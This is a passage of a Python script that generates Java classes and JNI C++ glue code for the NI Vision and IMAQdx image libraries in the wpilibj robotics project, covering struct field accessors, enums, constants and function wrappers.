self.emit.config_struct.get(self.name, option) def get_field_java_code(self, fname, ftype, arr, foffset, jfielddefs_private, backing="backing"): """Returns dict of fielddef, init, read, write, type """ if ftype.startswith("const"): ftype = ftype[5:].strip() if fname in self.sized_members: # Change from pointer to array if ftype[-1] == '*': ftype = ftype[:-1] arr = "" size_fname = self.sized_members[fname] size_jtype = c_to_jtype(self.size_members[size_fname], None) size_foffset = self.config_struct_get(size_fname) else: size_fname = "" size_jtype = None size_foffset = None is_pointer = False if ftype[-1] == '*' and ftype[:-1] in opaque_structs: # silently strip pointer from native structs ftype = ftype[:-1] elif ftype[-1] == '*' and (ftype, arr) not in java_types_map: # Not an array, but not inline either ftype = ftype[:-1] is_pointer = True # Hopefully the base type now jtype = c_to_jtype(ftype, arr) struct_sz = None buftype = "ByteBuffer" array_size = jtype.array_size or "" jaccessor = (None, None, None, None, None) writeBufs = [] backingRead = [] read = [] write = [] backingWrite = [] construct = [] toArg = "" typeemit = None if jtype.jni_sig == "[Ljava/lang/String;": # null-terminated strings if size_fname: jaccessor = java_accessor_map[size_jtype.jni_sig[0]] typeemit = strzArrayEmitSized else: typeemit = strzArrayEmitUnsized elif jtype.jni_sig[0] == '[': if is_pointer: raise NotImplementedError("pointer to array") if arr: construct.append("{fname} = new {ftype_one}[%s];" % arr) if jtype.is_opaque or jtype.is_enum: raise NotImplementedError("array of opaque and enum not implemented") elif jtype.is_struct: struct_sz = self.emit.config_struct.get(jtype.j_type[:-2], "_SIZE_") construct.extend((""" for (int i=0, off={foffset}; i<%s; i++, off += {struct_sz}) {fname}[i] = new {ftype_one}({backing}, off);""" % arr).split('\n')) read.extend(("""for ({ftype_one} it : {fname}) {{ it.read(); }}""").split('\n')) write.extend(("""for ({ftype_one} it : {fname}) {{ 
it.write(); }}""").split('\n')) else: raise NotImplementedError("sized array of unknown type") else: jaccessor = java_accessor_map[size_jtype.jni_sig[0]] if jtype.is_enum: typeemit = enumArrayEmit elif jtype.is_opaque: typeemit = opaqueArrayEmit elif ftype == "String255": typeemit = string255ArrayEmit elif jtype.is_struct: struct_sz = self.emit.config_struct.get(jtype.j_type[:-2], "_SIZE_") typeemit = structArrayEmit elif jtype.jni_sig[1] == 'B': typeemit = byteArrayEmit elif jtype.jni_sig[1] in java_accessor_map: buftype = "%sBuffer" % java_accessor_map[jtype.jni_sig[1]][0] struct_sz = java_size_map[jtype.jni_sig[1]] typeemit = jtypeArrayEmit else: raise ValueError("unrecognized jni signature '%s'" % jtype.jni_sig) elif jtype.is_enum: if is_pointer: raise NotImplementedError("pointer to enum") typeemit = enumEmit elif jtype.is_opaque or (jtype.is_struct and is_pointer): typeemit = opaqueEmit elif jtype.is_struct: typeemit = structEmit elif jtype.jni_sig[0] in java_accessor_map: if is_pointer: raise NotImplementedError("pointer to raw") jaccessor = java_accessor_map[jtype.jni_sig[0]] typeemit = jtypeEmit elif jtype.jni_sig == "Ljava/lang/String;": if is_pointer: raise NotImplementedError("pointer to string") if jtype.string_array: typeemit = strSizedEmit else: typeemit = strzEmit else: raise ValueError("unrecognized jni signature '%s'" % jtype.jni_sig) if typeemit is not None: writeBufs.extend(typeemit.writeBufs) construct.extend(typeemit.construct) backingRead.extend(typeemit.backingRead) read.extend(typeemit.read) write.extend(typeemit.write) backingWrite.extend(typeemit.backingWrite) toArg = typeemit.toArg for buf in writeBufs: jfielddefs_private.append("private %s;" % buf.format(buftype=buftype, fname=fname)) jfielddef = 'public %s %s;' % (jtype.j_type, fname) fargs = dict(fname=fname, ftype=jtype.j_type, ftype_one=jtype.j_type[:-2], foffset=foffset, size_fname=fname + "_" + size_fname, size_foffset=size_foffset, 
pointer_sz=self.emit.config_struct.get("_platform_", "pointer"), struct_sz=struct_sz, array_size=array_size, buftype=buftype, jaccessor=jaccessor[0], jaccessor_cast_out_pre=jaccessor[1], jaccessor_cast_out_post=jaccessor[2], jaccessor_cast_in_pre=jaccessor[3], jaccessor_cast_in_post=jaccessor[4], backing=backing) jconstruct = [x.format(**fargs) for x in construct] jwritebufs = [x.format(**fargs) for x in writeBufs] jbackingread = [x.format(**fargs) for x in backingRead] jread = [x.format(**fargs) for x in read] jwrite = [x.format(**fargs) for x in write] jbackingwrite = [x.format(**fargs) for x in backingWrite] jtoarg = toArg.format(**fargs) return dict(fielddef=jfielddef, construct=jconstruct, write_bufs=jwritebufs, backing_read=jbackingread, read=jread, write=jwrite, backing_write=jbackingwrite, to_arg=jtoarg, type=jtype, is_pointer=is_pointer, arr=arr, size_fname=size_fname, size_jtype=size_jtype, size_foffset=size_foffset) def get_java_code(self): jcargs = [] jcinit = [] jfielddefs = [] jfielddefs_private = [] jconstruct = [] jread = [] jwrite = [] # standard struct fields for fname, ftype, arr, comment in self.fields: if fname in self.size_members or fname in self.exclude_members: continue # don't emit if ":" in fname: continue # TODO: bit field foffset = self.config_struct_get(fname) field = self.get_field_java_code(fname, ftype, arr, foffset, jfielddefs_private) # XXX: hack to get short and float to work reasonably if field["type"].j_type == "short": jcargs.append("int {fname}".format(fname=fname)) jcinit.append("this.{fname} = (short){fname};".format(fname=fname)) elif field["type"].j_type == "float": jcargs.append("double {fname}".format(fname=fname)) jcinit.append("this.{fname} = (float){fname};".format(fname=fname)) else: jcargs.append("{ftype} {fname}".format(ftype=field["type"].j_type, fname=fname)) jcinit.append("this.{fname} = {fname};".format(fname=fname)) fielddef = field["fielddef"] if comment is not None: fielddef += ' // %s' % comment 
jfielddefs.append(fielddef) jconstruct.extend(field["construct"]) jread.extend(field["backing_read"]) jread.extend(field["read"]) jwrite.extend(field["write"]) jwrite.extend(field["backing_write"]) # typed union fields jfielddefs_union_private = [] for union_name, (switchvalue_name, members) in self.union_members.items(): # get union structure name and type info for fname, ftype, arr, comment in self.fields: if fname == union_name: union_ftype = ftype elif fname == switchvalue_name: switchvalue_ftype = ftype unionfields = self.emit.unions[union_ftype] # build map of union fields for faster lookup ufieldmap = {} for fname, ftype, arr, comment in unionfields: ufieldmap[fname] = (ftype, arr, comment) # common offset foffset = self.config_struct_get(union_name) for enumval, fname in members: # find the rest of the info from the union fields ftype, arr, comment = ufieldmap[fname] field = self.get_field_java_code(fname, ftype, arr, foffset, jfielddefs_union_private) fielddef = field["fielddef"] read = field["backing_read"] read.extend(field["read"]) write = field["write"] write.extend(field["backing_write"]) if comment is not None: fielddef += ' // %s' % comment jfielddefs.append(fielddef) jconstruct.extend(field["construct"]) if enumval.startswith("IMAQ_"): enumval = enumval[5:] ifcheck = "if (%s == %s.%s) " % (switchvalue_name, switchvalue_ftype, enumval) if len(read[0]) > 0 and read[0][0] == '{': read[0] = ifcheck + read[0] else: read = (" " + "\n ".join(read)).split('\n') read.insert(0, ifcheck + "{") read.append("}") if len(write[0]) > 0 and write[0][0] == '{': write[0] = ifcheck + write[0] else: write = (" " + "\n ".join(write)).split('\n') write.insert(0, ifcheck + "{") write.append("}") jread.extend(read) jwrite.extend(write) jfielddefs.extend(jfielddefs_private) # Java definition p1 = """ public static class {name} extends DisposedStruct {{ {jfielddefs} private void init() {{ {jconstruct} }} public {name}() {{ super({size}); init(); }}""" if jcargs: p2 = """ 
public {name}({jcargs}) {{ super({size}); {jcinit} }}""" else: p2 = "" p3 = """ protected {name}(ByteBuffer backing, int offset) {{ super(backing, offset, {size}); init(); }} protected {name}(long nativeObj, boolean owned) {{ super(nativeObj, owned, {size}); init(); }} protected void setBuffer(ByteBuffer backing, int offset) {{ super.setBuffer(backing, offset, {size}); }} public void read() {{ {jread} }} public void write() {{ {jwrite} }} public int size() {{ return {size}; }} }}""" return "".join([p1, p2, p3]).format( name=self.name, jfielddefs="\n ".join(jfielddefs), jread="\n ".join(jread), jwrite="\n ".join(jwrite), jconstruct="\n ".join(jconstruct), jcargs=", ".join(jcargs), jcinit="\n ".join(jcinit), size=self.config_struct_get("_SIZE_")) class JavaEmitter: def __init__(self, outdir, config, config_struct, library_funcs): self.outdir = outdir self.config = config self.config_struct = config_struct self.library_funcs = library_funcs self.package = "com.ni.vision" self.classname = "NIVision" self.classpath = self.package.replace(".", "/") + "/" + self.classname self.unions = {} self.errors = {} with open(os.path.join(outdir, "VisionException.java"), "wt") as f: print("""// // This file is auto-generated by wpilibj/wpilibJavaJNI/nivision/gen_java.py // Please do not edit! // package {package}; public class VisionException extends RuntimeException {{ private static final long serialVersionUID = 1L; public VisionException(String msg) {{ super(msg); }} @Override public String toString() {{ return "VisionException [" + super.toString() + "]"; }} }}""".format(package=self.package), file=f) self.out = open(os.path.join(outdir, "NIVision.java"), "wt") print("""// // This file is auto-generated by wpilibj/wpilibJavaJNI/nivision/gen_java.py // Please do not edit! 
// package {package}; import java.lang.reflect.*; import java.io.UnsupportedEncodingException; import java.nio.Buffer; import java.nio.ByteBuffer; import java.nio.ByteOrder; public class {classname} {{ private {classname}() {{}} private static native void imaqDispose(long addr); private static Constructor<?> constructDirectByteBuffer; private static Field bufferAddressField; static {{ try {{ Class<?>[] cArg = new Class[2]; cArg[0] = long.class; cArg[1] = int.class; constructDirectByteBuffer = Class.forName("java.nio.DirectByteBuffer").getDeclaredConstructor(cArg); constructDirectByteBuffer.setAccessible(true); bufferAddressField = Buffer.class.getDeclaredField("address"); bufferAddressField.setAccessible(true); }} catch (ReflectiveOperationException e) {{ throw new ExceptionInInitializerError(e); }} }} private static ByteBuffer newDirectByteBuffer(long addr, int cap) {{ try {{ return ((ByteBuffer)(constructDirectByteBuffer.newInstance(addr, cap))).order(ByteOrder.nativeOrder()); }} catch (ReflectiveOperationException e) {{ throw new ExceptionInInitializerError(e); }} }} private static long getByteBufferAddress(ByteBuffer bb) {{ try {{ return bufferAddressField.getLong(bb); }} catch (IllegalAccessException e) {{ return 0; }} }} public static ByteBuffer sliceByteBuffer(ByteBuffer bb, int offset, int size) {{ int pos = bb.position(); int lim = bb.limit(); bb.position(offset); bb.limit(offset+size); ByteBuffer new_bb = bb.slice().order(ByteOrder.nativeOrder()); bb.position(pos); bb.limit(lim); return new_bb; }} public static ByteBuffer getBytes(ByteBuffer bb, byte[] dst, int offset, int size) {{ int pos = bb.position(); bb.position(offset); bb.get(dst, 0, size); bb.position(pos); return bb; }} public static ByteBuffer putBytes(ByteBuffer bb, byte[] src, int offset, int size) {{ int pos = bb.position(); bb.position(offset); bb.put(src, 0, size); bb.position(pos); return bb; }} private static abstract class DisposedStruct {{ protected ByteBuffer backing; private boolean 
owned; protected DisposedStruct(int size) {{ backing = ByteBuffer.allocateDirect(size); backing.order(ByteOrder.nativeOrder()); owned = false; }} protected DisposedStruct(ByteBuffer backing, int offset, int size) {{ this.backing = sliceByteBuffer(backing, offset, size); owned = false; }} private DisposedStruct(long nativeObj, boolean owned, int size) {{ backing = newDirectByteBuffer(nativeObj, size); this.owned = owned; }} public void free() {{ if (owned) {{ imaqDispose(getByteBufferAddress(backing)); owned = false; backing = null; }} }} @Override protected void finalize() throws Throwable {{ if (owned) imaqDispose(getByteBufferAddress(backing)); super.finalize(); }} public long getAddress() {{ if (backing == null) return 0; write(); return getByteBufferAddress(backing); }} protected void setBuffer(ByteBuffer backing, int offset, int size) {{ this.backing = sliceByteBuffer(backing, offset, size); }} abstract public void read(); abstract public void write(); abstract public int size(); }} private static abstract class OpaqueStruct {{ private long nativeObj; private boolean owned; protected OpaqueStruct() {{ nativeObj = 0; owned = false; }} protected OpaqueStruct(long nativeObj, boolean owned) {{ this.nativeObj = nativeObj; this.owned = owned; }} public void free() {{ if (owned && nativeObj != 0) {{ imaqDispose(nativeObj); owned = false; nativeObj = 0; }} }} @Override protected void finalize() throws Throwable {{ if (owned && nativeObj != 0) imaqDispose(nativeObj); super.finalize(); }} public long getAddress() {{ return nativeObj; }} }} public static class RawData {{ private ByteBuffer buf; private boolean owned; public RawData() {{ owned = false; }} public RawData(ByteBuffer buf) {{ this.buf = buf; owned = false; }} private RawData(long nativeObj, boolean owned, int size) {{ buf = newDirectByteBuffer(nativeObj, size); this.owned = owned; }} public void free() {{ if (owned) {{ imaqDispose(getByteBufferAddress(buf)); owned = false; buf = null; }} }} @Override 
protected void finalize() throws Throwable {{ if (owned) imaqDispose(getByteBufferAddress(buf)); super.finalize(); }} public long getAddress() {{ if (buf == null) return 0; return getByteBufferAddress(buf); }} public ByteBuffer getBuffer() {{ return buf; }} public void setBuffer(ByteBuffer buf) {{ if (owned) free(); this.buf = buf; }} }}""".format(package=self.package, classname=self.classname), file=self.out) if int(self.config_struct.get("_platform_", "pointer")) == 4: # 32-bit addressing java_types_map[("size_t", None)] = JavaType("int", "int", "jint", "I") print(""" private static long getPointer(ByteBuffer bb, int offset) { return (long)bb.getInt(offset); } private static void putPointer(ByteBuffer bb, int offset, long address) { bb.putInt(offset, (int)address); } private static void putPointer(ByteBuffer bb, int offset, ByteBuffer buf) { if (buf == null) bb.putInt(offset, 0); else bb.putInt(offset, (int)getByteBufferAddress(buf)); } private static void putPointer(ByteBuffer bb, int offset, DisposedStruct struct) { if (struct == null) bb.putInt(offset, 0); else bb.putInt(offset, (int)struct.getAddress()); } private static void putPointer(ByteBuffer bb, int offset, OpaqueStruct struct) { if (struct == null) bb.putInt(offset, 0); else bb.putInt(offset, (int)struct.getAddress()); }""", file=self.out) else: # 64-bit addressing java_types_map[("size_t", None)] = JavaType("long", "long", "jlong", "J") print(""" private static long getPointer(ByteBuffer bb, int offset) { return bb.getLong(offset); } private static void putPointer(ByteBuffer bb, int offset, long address) { bb.putLong(offset, address); } private static void putPointer(ByteBuffer bb, int offset, ByteBuffer buf) { if (buf == null) bb.putLong(offset, 0); else bb.putLong(offset, getByteBufferAddress(buf)); } private static void putPointer(ByteBuffer bb, int offset, OpaqueStruct struct) { if (struct == null) bb.putLong(offset, 0); else bb.putLong(offset, struct.getAddress()); } private static void 
putPointer(ByteBuffer bb, int offset, DisposedStruct struct) { if (struct == null) bb.putLong(offset, 0); else bb.putLong(offset, struct.getAddress()); }""", file=self.out) self.outc = open(os.path.join(outdir, "NIVision.cpp"), "wt") print("""// // This file is auto-generated by wpilibj/wpilibJavaJNI/nivision/gen_java.py // Please do not edit! // #include <stdlib.h> #include <string.h> #include <assert.h> #include <jni.h> #include <nivision.h> #include <NIIMAQdx.h> static const char* getErrorText(int err); // throw java exception static void throwJavaException(JNIEnv *env) {{ jclass je = env->FindClass("{packagepath}/VisionException"); int err = imaqGetLastError(); const char* err_text = getErrorText(err); char* full_err_msg = static_cast<char*>(malloc(30+strlen(err_text))); sprintf(full_err_msg, "imaqError: %d: %s", err, err_text); env->ThrowNew(je, full_err_msg); free(full_err_msg); }} // throw IMAQdx java exception static void dxthrowJavaException(JNIEnv *env, IMAQdxError err) {{ jclass je = env->FindClass("{packagepath}/VisionException"); const char* err_text = getErrorText(err); char* full_err_msg = static_cast<char*>(malloc(30+strlen(err_text))); sprintf(full_err_msg, "IMAQdxError: %d: %s", err, err_text); env->ThrowNew(je, full_err_msg); free(full_err_msg); }} extern "C" {{ JNIEXPORT void JNICALL Java_{package}_{classname}_imaqDispose(JNIEnv* , jclass , jlong addr) {{ imaqDispose((void*)addr); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline 
IMAQdxError NI_FUNC IMAQdxGetAttributeString(IMAQdxSession id, const char* name, char value[IMAQDX_MAX_API_STRING_LENGTH]) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeString, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeEnum(IMAQdxSession id, const char* name, IMAQdxEnumItem* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeEnumItem, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeBool(IMAQdxSession id, const char* name, bool32* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeBool, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMinimumU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttributeMinimum(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMinimumI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttributeMinimum(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMinimumF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttributeMinimum(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMaximumU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttributeMaximum(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMaximumI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttributeMaximum(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMaximumF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttributeMaximum(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeIncrementU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttributeIncrement(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline 
IMAQdxError NI_FUNC IMAQdxGetAttributeIncrementI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttributeIncrement(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeIncrementF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttributeIncrement(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeU32(IMAQdxSession id, const char* name, uInt32 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeU32, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeI64(IMAQdxSession id, const char* name, Int64 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeI64, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeF64(IMAQdxSession id, const char* name, float64 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeF64, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeString(IMAQdxSession id, const char* name, const char* value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeString, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeEnum(IMAQdxSession id, const char* name, const IMAQdxEnumItem* value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeU32, value->Value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeBool(IMAQdxSession id, const char* name, bool32 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeBool, value); }} """.format(packagepath=self.package.replace(".", "/"), package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) self.block_comment("Opaque Structures") for name in sorted(opaque_structs): self.opaque_struct(name) def finish(self): print("}", file=self.out) print("""}} static const char* getErrorText(int err) {{ switch (err) {{ {errs} default: return "Unknown error"; }} }}""".format(errs="\n ".join( 'case %s: return "%s";' % (x, self.errors[x]) for x in sorted(self.errors))), 
file=self.outc) def config_get(self, section, option, fallback): try: return self.config.get(section, option) except (ValueError, configparser.NoSectionError, configparser.NoOptionError): return fallback def config_getboolean(self, section, option, fallback): try: return self.config.getboolean(section, option) except (ValueError, configparser.NoSectionError, configparser.NoOptionError): return fallback def block_comment(self, comment): print(""" /** * {comment} */""".format(comment=comment), file=self.out) print(""" /* * {comment} */""".format(comment=comment), file=self.outc) def opaque_struct(self, name): print(""" public static class {name} extends OpaqueStruct {{ private {name}() {{}} private {name}(long nativeObj, boolean owned) {{ super(nativeObj, owned); }} }}""".format(name=name), file=self.out) def define(self, name, value, comment): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return clean = None type = None after_struct = False if value == "TRUE": clean = "true" type = "boolean" elif value == "FALSE": clean = "false" type = "boolean" elif name.startswith("IMAQ_INIT_RGB") and value[0] == '{' and value[-1] == '}': return elif value.startswith("imaqMake"): clean = "new " + value[8:] type = value.split("(")[0][8:] after_struct = True elif value[0] == '"': if len(value) == 2: clean = "{ 0 }" else: clean = "{ %s,0 }" % ",".join("0x%x" % ord(c) for c in value[1:-1]) type = "byte[]" elif number_re.match(value): clean = value type = "int" elif constant_re.match(value): clean = value after_struct = value not in defined if clean is None: print("Invalid #define: %s" % name) return if name.startswith("ERR_"): self.errors[name] = comment return # strip IMAQ_ prefix if name.startswith("IMAQ_"): name = name[5:] code = " public static final {type} {name} = {value};" \ .format(type=type, name=name, value=clean) if after_struct: define_after_struct.append((name, code)) return print(code, file=self.out) defined.add(name) def 
text(self, text): print(text, file=self.out) def static_const(self, name, ctype, value): # strip IMAQ_ prefix if name.startswith("IMAQ_"): name = name[5:] if hasattr(value, "__iter__"): code = " public static final {ctype} {name} = new {ctype}({value});" value = ", ".join(value) else: code = "{name} = {value};" print(code.format(name=name, value=value, ctype=ctype), file=self.out) defined.add(name) def enum(self, name, values): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return valuestrs = [] need_search = False prev_value = -1 for vname, value, comment in values: if vname.endswith("SIZE_GUARD"): continue if value is None: # auto-increment value = "%d" % (prev_value + 1) value_i = int(value, 0) if value_i < 0 or value_i != (prev_value + 1): # need to do search instead of index for fromValue() need_search = True prev_value = value_i if vname == "IMAQdxErrorSuccess": continue if vname.startswith("IMAQdxError"): self.errors[vname] = comment continue if vname.startswith("IMAQ_"): vname = vname[5:] if vname.startswith("IMAQdx"): vname = vname[6:] if vname[0] in "0123456789": vname = "C" + vname valuestrs.append("%s(%s),%s" % (vname, value, " // %s" % comment if comment else "")) defined.add(vname) if not valuestrs: return print(""" public static enum {name} {{ {values} ; private final int value; private {name}(int value) {{ this.value = value; }} public static {name} fromValue(int val) {{""".format(name=name, values="\n ".join(valuestrs)), file=self.out) if need_search: print(""" for ({name} v : values()) {{ if (v.value == val) return v; }} return null;""".format(name=name), file=self.out) else: print(""" try {{ return values()[val]; }} catch (ArrayIndexOutOfBoundsException e) {{ return null; }}""".format(), file=self.out) print(""" }} public int getValue() {{ return value; }} }}""".format(), file=self.out) defined.add(name) enums.add(name) def typedef(self, name, typedef, arr): if self.config_getboolean(name, "exclude", 
fallback=False): return if name in opaque_structs: return if typedef.startswith("struct"): return elif typedef.startswith("union"): return elif (name, arr) not in java_types_map: java_types_map[(name, arr)] = c_to_jtype(typedef, arr).copy() if arr is None: java_types_map[(name, "")] = c_to_jtype(typedef, "").copy() defined.add(name) def typedef_function(self, name, restype, params): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return raise NotImplementedError("typedef function not implemented") def function(self, name, restype, params): if name not in self.library_funcs: return if name == "IMAQdxEnumerateVideoModes": # full custom code print(""" public static class dxEnumerateVideoModesResult {{ public IMAQdxEnumItem[] videoModeArray; public int currentMode; private ByteBuffer videoModeArray_buf; private dxEnumerateVideoModesResult(ByteBuffer rv_buf, ByteBuffer videoModeArray_buf) {{ this.videoModeArray_buf = videoModeArray_buf; int count = rv_buf.getInt(0); videoModeArray = new IMAQdxEnumItem[count]; for (int i=0, off=0; i<count; i++, off += {struct_sz}) {{ videoModeArray[i] = new IMAQdxEnumItem(videoModeArray_buf, off); videoModeArray[i].read(); }} currentMode = rv_buf.getInt(8); }} }} public static dxEnumerateVideoModesResult IMAQdxEnumerateVideoModes(int id) {{ ByteBuffer rv_buf = ByteBuffer.allocateDirect(8+8).order(ByteOrder.nativeOrder()); long rv_addr = getByteBufferAddress(rv_buf); _IMAQdxEnumerateVideoModes(id, 0, rv_addr+0, rv_addr+8); int count = rv_buf.getInt(0); ByteBuffer videoModeArray_buf = ByteBuffer.allocateDirect(count*{struct_sz}).order(ByteOrder.nativeOrder()); _IMAQdxEnumerateVideoModes(id, getByteBufferAddress(videoModeArray_buf), rv_addr+0, rv_addr+8); dxEnumerateVideoModesResult rv = new dxEnumerateVideoModesResult(rv_buf, videoModeArray_buf); return rv; }} private static native void _IMAQdxEnumerateVideoModes(int id, long videoModeArray, long count, long currentMode);""".format( 
struct_sz=self.config_struct.get("IMAQdxEnumItem", "_SIZE_")), file=self.out) print(""" JNIEXPORT void JNICALL Java_{package}_{classname}__1IMAQdxEnumerateVideoModes(JNIEnv* env, jclass , jint id, jlong videoModeArray, jlong count, jlong currentMode) {{ IMAQdxError rv = IMAQdxEnumerateVideoModes((IMAQdxSession)id, (IMAQdxVideoMode*)videoModeArray, (uInt32*)count, (uInt32*)currentMode); if (rv != IMAQdxErrorSuccess) dxthrowJavaException(env, rv); }}""".format(package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) return elif name == "IMAQdxGetImageData": print(""" public static int IMAQdxGetImageData(int id, ByteBuffer buffer, IMAQdxBufferNumberMode mode, int desiredBufferNumber) {{ long buffer_addr = getByteBufferAddress(buffer); int buffer_size = buffer.capacity(); return _IMAQdxGetImageData(id, buffer_addr, buffer_size, mode.getValue(), desiredBufferNumber); }} private static native int _IMAQdxGetImageData(int id, long buffer, int bufferSize, int mode, int desiredBufferNumber);""".format(), file=self.out) print(""" JNIEXPORT jint JNICALL Java_{package}_{classname}__1IMAQdxGetImageData(JNIEnv* env, jclass , jint id, jlong buffer, jint bufferSize, jint mode, jint desiredBufferNumber) {{ uInt32 actualBufferNumber; IMAQdxError rv = IMAQdxGetImageData((IMAQdxSession)id, (void*)buffer, (uInt32)bufferSize, (IMAQdxBufferNumberMode)mode, (uInt32)desiredBufferNumber, &actualBufferNumber); if (rv != IMAQdxErrorSuccess) dxthrowJavaException(env, rv); return (jint)actualBufferNumber; }}""".format(package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) elif name == "imaqReadFile": print(""" public static void imaqReadFile(Image image, String fileName) {{ ByteBuffer fileName_buf; byte[] fileName_bytes; try {{ fileName_bytes = fileName.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ fileName_bytes = new byte[0]; }} fileName_buf = ByteBuffer.allocateDirect(fileName_bytes.length+1); putBytes(fileName_buf, 
fileName_bytes, 0, fileName_bytes.length).put(fileName_bytes.length, (byte)0); _imaqReadFile(image.getAddress(), getByteBufferAddress(fileName_buf), 0, 0); }} private static native void _imaqReadFile(long image, long fileName, long colorTable, long numColors);""".format(), file=self.out) print(""" JNIEXPORT void JNICALL Java_{package}_{classname}__1imaqReadFile(JNIEnv* env, jclass , jlong image, jlong fileName, jlong colorTable, jlong numColors) {{ int rv = imaqReadFile((Image*)image, (const char*)fileName, (RGBValue*)colorTable, (int*)numColors); if (rv == 0) throwJavaException(env); }}""".format(package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) return if self.config_getboolean(name, "exclude", fallback=False): return # common return cases retpointer = self.config_getboolean(name, "rvdisposed", fallback=False) j_funcargs = [] jn_funcargs = [] jni_funcargs = [("env", java_types_map["env", None]), ("", java_types_map["cls", None])] jn_passedargs = {} paramtypes = {} jinit = [] jfini = [] exceptioncheck = "" retc = "" jretc = "" if restype == "int": functype = "STDFUNC" rettype = c_to_jtype("void", None) exceptioncheck = "if (rv == 0) throwJavaException(env);" elif restype == "IMAQdxError": functype = "STDFUNC" rettype = c_to_jtype("void", None) exceptioncheck = "if (rv != IMAQdxErrorSuccess) dxthrowJavaException(env, rv);" else: if restype[-1] == "*": functype = "STDPTRFUNC" exceptioncheck = "if (!rv) throwJavaException(env);" else: functype = "RETFUNC" if restype[-1] == "*" and restype[:-1] in opaque_structs: # silently strip pointer from native structs rettype = c_to_jtype(restype[:-1], None) else: rettype = c_to_jtype(restype, None) # TODO: defaults # defaults = dict((y.strip() for y in x.split(':')) for x in # self.config_get(name, "defaults", "").split(',') if x) sized_params = dict(tuple(y.strip() for y in x.split(':')) for x in self.config_get(name, "arraysize", "").split(',') if x) size_params = set(sized_params.values()) 
inparams = [x.strip() for x in self.config_get(name, "inparams", "").split(',') if x.strip()] outparams = [x.strip() for x in self.config_get(name, "outparams", "").split(',') if x.strip()] nullokparams = [x.strip() for x in self.config_get(name, "nullok", "").split(',') if x.strip()] # guess additional output parameters for pname, ptype, arr in params: if (pname not in inparams and pname not in outparams and pname not in sized_params and ptype and not ptype.startswith("const") and ptype[:-1] not in opaque_structs and ptype[-1] == "*"): outparams.append(pname) retarraysize = self.config_get(name, "retarraysize", "").strip() if retarraysize: size_params.add(retarraysize) # rettype = c_to_jtype(restype, "") if retarraysize not in outparams: outparams.append(retarraysize) retsize = self.config_get(name, "retsize", "").strip() if retsize: size_params.add(retsize) if retsize not in outparams: outparams.append(retsize) retowned = not self.config_getboolean(name, "retunowned", False) # Input and output parameter code is generated with the help of # "virtual" structures. The input parameters are collected in one # structure, the output parameters in another. Only if there are # multiple output parameters or an output array is the output # structure actually generated into the Java code. 
